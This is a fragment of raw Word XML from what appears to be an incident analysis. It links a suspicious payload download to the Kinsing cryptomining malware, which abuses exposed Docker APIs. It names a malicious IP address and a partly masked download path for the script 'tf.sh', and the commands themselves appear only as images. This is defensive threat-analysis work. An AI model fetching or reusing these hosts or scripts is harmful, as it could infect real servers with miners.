            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="122530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2b4bb1bce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314" cy="25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449955">
        <w:rPr/>
        <w:t>As we can see from the picture above</w:t>
      </w:r>
      <w:r w:rsidR="4913D4D9">
        <w:rPr/>
        <w:t>, there are lines that indicate a possible attempt of downloading malicious payload:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="4913D4D9" w:rsidP="57C4D39E" w:rsidRDefault="4913D4D9" w14:paraId="50B62111" w14:textId="72638FE4">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="4913D4D9">
        <w:drawing>
          <wp:inline wp14:editId="0ACB77EA" wp14:anchorId="4D9AC991">
            <wp:extent cx="4572000" cy="123825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="22889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d8237997a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13D4D9">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="4913D4D9">
        <w:drawing>
          <wp:inline wp14:editId="44B8167F" wp14:anchorId="104DBC2E">
            <wp:extent cx="4572000" cy="123825"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1758945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5df296bbb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03C72" w:rsidP="57C4D39E" w:rsidRDefault="5AE03C72" w14:paraId="04E31E5D" w14:textId="5ADB2CC3">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="5AE03C72">
        <w:rPr/>
        <w:t xml:space="preserve">By putting the IP </w:t>
      </w:r>
      <w:r w:rsidR="5E7EF012">
        <w:rPr/>
        <w:t xml:space="preserve">(185.246.90.203) </w:t>
      </w:r>
      <w:r w:rsidR="5AE03C72">
        <w:rPr/>
        <w:t xml:space="preserve">contained in the command above through </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="6A3EFA2B">
        <w:rPr/>
        <w:t>VirusTotal</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="5AE03C72">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0D9EDEA5">
        <w:rPr/>
        <w:t>we get results that indicate malicious activity</w:t>
      </w:r>
      <w:r w:rsidR="5AE03C72">
        <w:rPr/>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1D956FA9" w:rsidP="57C4D39E" w:rsidRDefault="1D956FA9" w14:paraId="1B1FC9A9" w14:textId="31ECC17A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="1D956FA9">
        <w:drawing>
          <wp:inline wp14:editId="7523B5C0" wp14:anchorId="3F1638D0">
            <wp:extent cx="4422246" cy="1962371"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="100214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148f6d659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46" cy="19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54BA4" w:rsidP="57C4D39E" w:rsidRDefault="6A054BA4" w14:paraId="2F1D1AEE" w14:textId="25DF2221">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidR="6A054BA4">
        <w:rPr/>
        <w:t xml:space="preserve">After </w:t>
      </w:r>
      <w:r w:rsidR="6A054BA4">
        <w:rPr/>
        <w:t>downloading</w:t>
      </w:r>
      <w:r w:rsidR="6A054BA4">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6A054BA4">
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="6A054BA4">
        <w:rPr/>
        <w:t xml:space="preserve"> file tf.sh </w:t>
      </w:r>
      <w:r w:rsidR="6A054BA4">
        <w:rPr/>
        <w:t>from</w:t>
      </w:r>
      <w:r w:rsidR="6A054BA4">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="R9747c89e8bf24e10">
        <w:r w:rsidRPr="57C4D39E" w:rsidR="6A054BA4">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>http://185.</w:t>
        </w:r>
        <w:r w:rsidRPr="57C4D39E" w:rsidR="5CAF13BF">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>XXX</w:t>
        </w:r>
        <w:r w:rsidRPr="57C4D39E" w:rsidR="6A054BA4">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>.</w:t>
        </w:r>
        <w:r w:rsidRPr="57C4D39E" w:rsidR="35F66A3A">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>XXX</w:t>
        </w:r>
        <w:r w:rsidRPr="57C4D39E" w:rsidR="6A054BA4">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>.203/tf.sh</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="6A054BA4">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="440278F1">
        <w:rPr/>
        <w:t xml:space="preserve">and </w:t>
      </w:r>
      <w:r w:rsidR="440278F1">
        <w:rPr/>
        <w:t>reading</w:t>
      </w:r>
      <w:r w:rsidR="440278F1">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="440278F1">
        <w:rPr/>
        <w:t>through</w:t>
      </w:r>
      <w:r w:rsidR="440278F1">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="440278F1">
        <w:rPr/>
        <w:t>it</w:t>
      </w:r>
      <w:r w:rsidR="440278F1">
        <w:rPr/>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="482F626B">
        <w:rPr/>
        <w:t xml:space="preserve">it turns out it </w:t>
      </w:r>
      <w:r w:rsidR="6A054BA4">
        <w:rPr/>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="6A054BA4">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6A054BA4">
        <w:rPr/>
        <w:t>related</w:t>
      </w:r>
      <w:r w:rsidR="6A054BA4">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6A054BA4">
        <w:rPr/>
        <w:t>to</w:t>
      </w:r>
      <w:r w:rsidR="6A054BA4">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6A054BA4">
        <w:rPr/>
        <w:t>the</w:t>
      </w:r>
      <w:r w:rsidR="6A054BA4">
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="6A054BA4">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:i w:val="0"/>
          <w:iCs w:val="0"/>
        </w:rPr>
        <w:t>kinsing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="6A054BA4">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="6A054BA4">
        <w:rPr/>
        <w:t>malware</w:t>
      </w:r>
      <w:r w:rsidR="5A8C0FB0">
        <w:rPr/>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="5A8C0FB0">
        <w:rPr/>
        <w:t>Kinsing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="5A8C0FB0">
        <w:rPr/>
        <w:t xml:space="preserve"> is a popular malware family that main objective is to mine cryptocurrency on </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="5A8C0FB0">
        <w:rPr/>
        <w:t>the vulnerable</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="5A8C0FB0">
        <w:rPr/>
        <w:t xml:space="preserve"> servers. The malware itself exploits the misconfigured Docker API port and runs a malici</w:t>
      </w:r>
      <w:r w:rsidR="3CE79BAB">
        <w:rPr/>
        <w:t xml:space="preserve">ous Ubuntu </w:t>
      </w:r>
      <w:r w:rsidR="3CE79BAB">
        <w:rPr/>
        <w:t>cont</w:t>
      </w:r>
      <w:r w:rsidR="6D791B07">
        <w:rPr/>
        <w:t>a</w:t>
      </w:r>
      <w:r w:rsidR="3CE79BAB">
        <w:rPr/>
        <w:t>iner</w:t>
      </w:r>
      <w:r w:rsidR="3CE79BAB">
        <w:rPr/>
        <w:t xml:space="preserve"> which contains a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="3CE79BAB">
        <w:rPr/>
        <w:t>kinsing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="3CE79BAB">
        <w:rPr/>
        <w:t xml:space="preserve"> malicious malware (via </w:t>
      </w:r>
      <w:hyperlink r:id="Rb2737927cb48428b">
        <w:r w:rsidRPr="57C4D39E" w:rsidR="3CE79BAB">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://gbhackers.com/kinsing-malware-attack/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="3CE79BAB">
        <w:rPr/>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="76DC1DBB">
        <w:rPr/>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="76DC1DBB">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="5582D061" w:rsidP="57C4D39E" w:rsidRDefault="5582D061" w14:paraId="57F584AC" w14:textId="12B54D17">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="5582D061">
        <w:drawing>
          <wp:inline wp14:editId="28DBD42D" wp14:anchorId="792AFA08">
            <wp:extent cx="4572000" cy="3124200"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="1512652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bf98e8a3b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812BB" w:rsidP="57C4D39E" w:rsidRDefault="06B812BB" w14:paraId="5613067C" w14:textId="3A05E964">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="06B812BB">
        <w:rPr/>
        <w:t xml:space="preserve">It </w:t>
      </w:r>
      <w:r w:rsidR="5582D061">
        <w:rPr/>
        <w:t xml:space="preserve">can </w:t>
      </w:r>
      <w:r w:rsidR="16C0F7BA">
        <w:rPr/>
        <w:t xml:space="preserve">be </w:t>
      </w:r>
      <w:r w:rsidR="5582D061">
        <w:rPr/>
        <w:t>see</w:t>
      </w:r>
      <w:r w:rsidR="15CF442E">
        <w:rPr/>
        <w:t>n</w:t>
      </w:r>
      <w:r w:rsidR="5582D061">
        <w:rPr/>
        <w:t xml:space="preserve"> that malware</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="5582D061">
        <w:rPr/>
        <w:t xml:space="preserve"> is downloaded via shell script available at two </w:t>
      </w:r>
      <w:r w:rsidR="5582D061">
        <w:rPr/>
        <w:t>ad</w:t>
      </w:r>
      <w:r w:rsidR="4BE2A9CE">
        <w:rPr/>
        <w:t>d</w:t>
      </w:r>
      <w:r w:rsidR="5582D061">
        <w:rPr/>
        <w:t>resses</w:t>
      </w:r>
      <w:r w:rsidR="5582D061">
        <w:rPr/>
        <w:t xml:space="preserve">: BIN_DOWNLOAD_URL and BIN_DOWNLOAD_URL2. </w:t>
      </w:r>
      <w:r w:rsidR="0A24AA29">
        <w:rPr/>
        <w:t xml:space="preserve">The script also contains various Docker-related commands that kills already running </w:t>
      </w:r>
      <w:r w:rsidR="0A24AA29">
        <w:rPr/>
        <w:t>miner</w:t>
      </w:r>
      <w:r w:rsidR="0A24AA29">
        <w:rPr/>
        <w:t xml:space="preserve"> processes on the victim system (via </w:t>
      </w:r>
      <w:hyperlink r:id="R14216b167e7045ba">
        <w:r w:rsidRPr="57C4D39E" w:rsidR="0A24AA29">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://securityaffairs.co/wordpress/130973/cyber-crime/uptycs-docker-malware-attacks.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="0A24AA29">
        <w:rPr/>
        <w:t>) :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0A24AA29" w:rsidP="57C4D39E" w:rsidRDefault="0A24AA29" w14:paraId="67030D22" w14:textId="1D28B64A">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="0A24AA29">
        <w:drawing>
          <wp:inline wp14:editId="16E7F2F2" wp14:anchorId="0F7771DE">
            <wp:extent cx="4572000" cy="3267075"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="142486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4f894116b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C7DB6" w:rsidP="57C4D39E" w:rsidRDefault="3A5C7DB6" w14:paraId="4A504C43" w14:textId="66A4AA48">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r w:rsidR="3A5C7DB6">
        <w:rPr/>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="3A5C7DB6">
        <w:rPr/>
        <w:t>Kinsing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="3A5C7DB6">
        <w:rPr/>
        <w:t xml:space="preserve"> Malware Attack Tree is described below (via </w:t>
      </w:r>
      <w:hyperlink r:id="R2ef04a7d2972497b">
        <w:r w:rsidRPr="57C4D39E" w:rsidR="3A5C7DB6">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
          </w:rPr>
          <w:t>https://gbhackers.com/kinsing-malware-attack/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidR="3A5C7DB6">
        <w:rPr/>
        <w:t>) :</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="3A5C7DB6" w:rsidP="57C4D39E" w:rsidRDefault="3A5C7DB6" w14:paraId="703314D6" w14:textId="17F6AD30">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
      </w:pPr>
      <w:r w:rsidR="3A5C7DB6">
        <w:drawing>
          <wp:inline wp14:editId="4BA0C69B" wp14:anchorId="39C0427B">
            <wp:extent cx="4572000" cy="2867025"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2113414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c553848634f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E9876" w:rsidP="57C4D39E" w:rsidRDefault="1D8E9876" w14:paraId="563813A6" w14:textId="72AF4217">
      <w:pPr>
        <w:pStyle w:val="Normal"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="57C4D39E" w:rsidR="1D8E9876">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
        </w:rPr>
        <w:t>Related information:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="1D8E9876" w:rsidP="57C4D39E" w:rsidRDefault="1D8E9876" w14:paraId="381FACE2" w14:textId="0577E334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sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="R12033ddf63704d7f">
        <w:r w:rsidRPr="57C4D39E" w:rsidR="1D8E9876">
          <w:rPr>
            <w:rStyle w:val="Hipervnculo"/>
            <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:eastAsia="Calibri" w:cs="Calibri"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
          </w:rPr>
          <w:t>https://www.cyberark.com/resources/threat-research-blog/kinsing-the-malware-with-two-faces</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:sectPr w:rsidRPr="00C73D00" w:rsidR="00BD0B0F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Qyi99ligWSCbT" int2:id="gAjxbKhc">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="0PHPB26Ly6xYnP" int2:id="DRAezq4o">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="JFfgxsDgl66gkn" int2:id="ursUCXDa">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="a5QuKDH5csIuKw" int2:id="4zRImv3B">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="XJvsCRg33afxAQ" int2:id="ROe6qqS7">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="nlKk+OCpS/Pk8B" int2:id="ASQV4Srh">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="g2xibVLz+y6lQ6" int2:id="A00P00u9">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="lhEEIVhiWr7iKw" int2:id="VXgfDlzX">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="fwSOWkiihvopBo" int2:id="VsC3pKlZ">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="Bf/Rlf11j6SilP" int2:id="POkiyCnl">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="XGcinYquPrC4VO" int2:id="CdjLJNqd">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="FfnoX9CJKNqZ2s" int2:id="FF9bIZZw">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="BC3EUS+j05HFFw" int2:id="x6zO7QiT">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="EAwMNvvpNvH0Y/" int2:id="bN8ggBPR">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:textHash int2:hashCode="2x39RbFj4PKZsO" int2:id="cOUAeDkr">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:textHash>
    <int2:bookmark int2:bookmarkName="_Int_ED3r8QTs" int2:invalidationBookmarkName="" int2:hashCode="eM0SV8N/2oIcer" int2:id="5B5RiSBO">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_dKKdAc3S" int2:invalidationBookmarkName="" int2:hashCode="94tQPxbYWp79G+" int2:id="9hCkvOPa">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_WS7GXGHK" int2:invalidationBookmarkName="" int2:hashCode="I9+oiEdoDmv8mG" int2:id="r9ADr0KC">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_IwxwUEJe" int2:invalidationBookmarkName="" int2:hashCode="8PSgMak/DDFLvi" int2:id="wQnqwqrG">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_1uusXdO2" int2:invalidationBookmarkName="" int2:hashCode="7Yl4u0GNSHBs7j" int2:id="McugO2xK">
      <int2:state int2:type="LegacyProofing" int2:value="Rejected"/>
    </int2:bookmark>
    <int2:bookmark int2:bookmarkName="_Int_7xp7RCrB" int2:invalidationBookmarkName="" int2:hashCode="pk7KzULoUnF5yD" int2:id="IhWLAYom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24205a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66951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37939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bc6c0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89f7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77CF107B"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="F4202D8C"/>
    <w:lvl w:ilvl="0" w:tplc="CD68A0B6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:pStyle w:val="FindingTableLabel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430053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B0F"/>
    <w:rsid w:val="001131B3"/>
    <w:rsid w:val="002B0632"/>
    <w:rsid w:val="002D4E01"/>
    <w:rsid w:val="0040F553"/>
    <w:rsid w:val="008944EF"/>
    <w:rsid w:val="008F1064"/>
    <w:rsid w:val="00B15381"/>
    <w:rsid w:val="00BD0B0F"/>
    <w:rsid w:val="00C6C65F"/>
    <w:rsid w:val="00C73D00"/>
    <w:rsid w:val="00DF6071"/>
    <w:rsid w:val="0138C30A"/>
    <w:rsid w:val="01A2527C"/>
    <w:rsid w:val="01DCC5B4"/>
    <w:rsid w:val="020C8A21"/>
    <w:rsid w:val="0234B356"/>
    <w:rsid w:val="028E70E5"/>
    <w:rsid w:val="02B2AC00"/>
    <w:rsid w:val="02D4936B"/>
    <w:rsid w:val="033136AE"/>
    <w:rsid w:val="037F4AE6"/>
    <w:rsid w:val="03BBD64C"/>
    <w:rsid w:val="03F7B41E"/>
    <w:rsid w:val="049527AA"/>
    <w:rsid w:val="04FE7755"/>
    <w:rsid w:val="0504DBDC"/>
    <w:rsid w:val="0561C9C6"/>
    <w:rsid w:val="05B48DD4"/>
    <w:rsid w:val="05CDB631"/>
    <w:rsid w:val="068FD60D"/>
    <w:rsid w:val="06919874"/>
    <w:rsid w:val="06B812BB"/>
    <w:rsid w:val="06CDA220"/>
    <w:rsid w:val="06F80AFE"/>
    <w:rsid w:val="0714F8EF"/>
    <w:rsid w:val="0726D9B0"/>
    <w:rsid w:val="0741A5A8"/>
    <w:rsid w:val="07875617"/>
    <w:rsid w:val="07AE06CC"/>
    <w:rsid w:val="07B9AFFA"/>
    <w:rsid w:val="0844D963"/>
    <w:rsid w:val="08A82FEE"/>
    <w:rsid w:val="08F5C4E3"/>
    <w:rsid w:val="0903F6E6"/>
    <w:rsid w:val="090556F3"/>
    <w:rsid w:val="09649DB9"/>
    <w:rsid w:val="097332AF"/>
    <w:rsid w:val="0995974A"/>
    <w:rsid w:val="0A24AA29"/>
    <w:rsid w:val="0AAB1D4F"/>
    <w:rsid w:val="0AFDC839"/>
    <w:rsid w:val="0B0B81D3"/>
    <w:rsid w:val="0B165377"/>
    <w:rsid w:val="0B451175"/>
    <w:rsid w:val="0B665C50"/>
    <w:rsid w:val="0BA10B85"/>
    <w:rsid w:val="0BD3F686"/>
    <w:rsid w:val="0BD77597"/>
    <w:rsid w:val="0BE3DD6B"/>
    <w:rsid w:val="0CC7B979"/>
    <w:rsid w:val="0CD818F4"/>
    <w:rsid w:val="0D9EDEA5"/>
    <w:rsid w:val="0DBF9FB9"/>
    <w:rsid w:val="0E1FC1DB"/>
    <w:rsid w:val="0FB46884"/>
    <w:rsid w:val="0FC94BD6"/>
    <w:rsid w:val="0FDEF2F6"/>
    <w:rsid w:val="1094B1EF"/>
    <w:rsid w:val="10ABD3F2"/>
    <w:rsid w:val="10D12CEA"/>
    <w:rsid w:val="10D63726"/>
    <w:rsid w:val="11055841"/>
    <w:rsid w:val="1119FF25"/>
    <w:rsid w:val="117F4067"/>
    <w:rsid w:val="11B784BF"/>
    <w:rsid w:val="11D47AC7"/>
    <w:rsid w:val="11FB0A15"/>
    <w:rsid w:val="1246C7CF"/>
    <w:rsid w:val="129310DC"/>
    <w:rsid w:val="12D3C7D8"/>
    <w:rsid w:val="13535520"/>
    <w:rsid w:val="13DDA20C"/>
    <w:rsid w:val="1458F4FA"/>
    <w:rsid w:val="148FD840"/>
    <w:rsid w:val="1492285C"/>
    <w:rsid w:val="14CC7A70"/>
    <w:rsid w:val="14E32AD9"/>
    <w:rsid w:val="14FCFD6C"/>
    <w:rsid w:val="1530DD24"/>
    <w:rsid w:val="15B19239"/>
    <w:rsid w:val="15CF442E"/>
    <w:rsid w:val="1648650D"/>
    <w:rsid w:val="16BB638E"/>
    <w:rsid w:val="16C0F7BA"/>
    <w:rsid w:val="1716BF58"/>
    <w:rsid w:val="17A0F537"/>
    <w:rsid w:val="17C5C8C5"/>
    <w:rsid w:val="17CECE15"/>
    <w:rsid w:val="182559EA"/>
    <w:rsid w:val="18C48946"/>
    <w:rsid w:val="1943095C"/>
    <w:rsid w:val="199F8AB2"/>
    <w:rsid w:val="19B61423"/>
    <w:rsid w:val="1A97E640"/>
    <w:rsid w:val="1C39F322"/>
    <w:rsid w:val="1C74665A"/>
    <w:rsid w:val="1CA7CEDE"/>
    <w:rsid w:val="1CD0C5B9"/>
    <w:rsid w:val="1CF28B2C"/>
    <w:rsid w:val="1D8E95CC"/>
    <w:rsid w:val="1D8E9876"/>
    <w:rsid w:val="1D919F7E"/>
    <w:rsid w:val="1D956FA9"/>
    <w:rsid w:val="1DD5C383"/>
    <w:rsid w:val="1E167A7F"/>
    <w:rsid w:val="1E449955"/>
    <w:rsid w:val="1E747C2A"/>
    <w:rsid w:val="1FE95F9E"/>
    <w:rsid w:val="201E886D"/>
    <w:rsid w:val="202DCB06"/>
    <w:rsid w:val="20319852"/>
    <w:rsid w:val="20BAC9E7"/>
    <w:rsid w:val="20C64DDA"/>
    <w:rsid w:val="20D03957"/>
    <w:rsid w:val="21149923"/>
    <w:rsid w:val="2146325F"/>
    <w:rsid w:val="216E5B48"/>
    <w:rsid w:val="219C9252"/>
    <w:rsid w:val="220DA879"/>
    <w:rsid w:val="231D0DE5"/>
    <w:rsid w:val="23A36E29"/>
    <w:rsid w:val="23BC6E04"/>
    <w:rsid w:val="24214F56"/>
    <w:rsid w:val="2469C61D"/>
    <w:rsid w:val="24A36A1E"/>
    <w:rsid w:val="24E56DEB"/>
    <w:rsid w:val="24F69326"/>
    <w:rsid w:val="24F944B0"/>
    <w:rsid w:val="24FD0D49"/>
    <w:rsid w:val="2590213A"/>
    <w:rsid w:val="25D34382"/>
    <w:rsid w:val="25F1228B"/>
    <w:rsid w:val="26B9CDF7"/>
    <w:rsid w:val="274DA067"/>
    <w:rsid w:val="2765086F"/>
    <w:rsid w:val="27784B01"/>
    <w:rsid w:val="27A6C519"/>
    <w:rsid w:val="2817BB65"/>
    <w:rsid w:val="2844C585"/>
    <w:rsid w:val="2881541C"/>
    <w:rsid w:val="2889791F"/>
    <w:rsid w:val="28A6A16F"/>
    <w:rsid w:val="28B68725"/>
    <w:rsid w:val="29AF91BD"/>
    <w:rsid w:val="2A4ECBF7"/>
    <w:rsid w:val="2AA479A6"/>
    <w:rsid w:val="2AB4B6C5"/>
    <w:rsid w:val="2ACC7D61"/>
    <w:rsid w:val="2B3239C1"/>
    <w:rsid w:val="2B52FF32"/>
    <w:rsid w:val="2B6E6372"/>
    <w:rsid w:val="2B95993C"/>
    <w:rsid w:val="2BB8F4DE"/>
    <w:rsid w:val="2BEE27E7"/>
    <w:rsid w:val="2C4001AA"/>
    <w:rsid w:val="2E509CF6"/>
    <w:rsid w:val="2E718842"/>
    <w:rsid w:val="2E7E9697"/>
    <w:rsid w:val="2EA81E6F"/>
    <w:rsid w:val="2EAEEDFC"/>
    <w:rsid w:val="2F1A6C89"/>
    <w:rsid w:val="2F3FCC62"/>
    <w:rsid w:val="2F565631"/>
    <w:rsid w:val="2F75178B"/>
    <w:rsid w:val="2FB0F00F"/>
    <w:rsid w:val="2FF7F14A"/>
    <w:rsid w:val="30E6AA01"/>
    <w:rsid w:val="3121239F"/>
    <w:rsid w:val="31304C18"/>
    <w:rsid w:val="31686639"/>
    <w:rsid w:val="31BAA3A2"/>
    <w:rsid w:val="31DA899A"/>
    <w:rsid w:val="320961E9"/>
    <w:rsid w:val="325DB684"/>
    <w:rsid w:val="32A6980E"/>
    <w:rsid w:val="335207BA"/>
    <w:rsid w:val="336B3017"/>
    <w:rsid w:val="33D258D0"/>
    <w:rsid w:val="340FBC48"/>
    <w:rsid w:val="341E4AC3"/>
    <w:rsid w:val="346E7C4F"/>
    <w:rsid w:val="3478C714"/>
    <w:rsid w:val="35037F3B"/>
    <w:rsid w:val="357D77BC"/>
    <w:rsid w:val="35BD9C61"/>
    <w:rsid w:val="35F66A3A"/>
    <w:rsid w:val="3624B035"/>
    <w:rsid w:val="365918AA"/>
    <w:rsid w:val="369D9F5F"/>
    <w:rsid w:val="36A48C8C"/>
    <w:rsid w:val="36D66A0E"/>
    <w:rsid w:val="380CDB84"/>
    <w:rsid w:val="386B9CCE"/>
    <w:rsid w:val="38E32D6B"/>
    <w:rsid w:val="391072EE"/>
    <w:rsid w:val="395E6E8D"/>
    <w:rsid w:val="3987B99C"/>
    <w:rsid w:val="39DA719B"/>
    <w:rsid w:val="3A12CAD7"/>
    <w:rsid w:val="3A40E219"/>
    <w:rsid w:val="3A549A98"/>
    <w:rsid w:val="3A5C7DB6"/>
    <w:rsid w:val="3B2FC535"/>
    <w:rsid w:val="3B485D8B"/>
    <w:rsid w:val="3B6185E8"/>
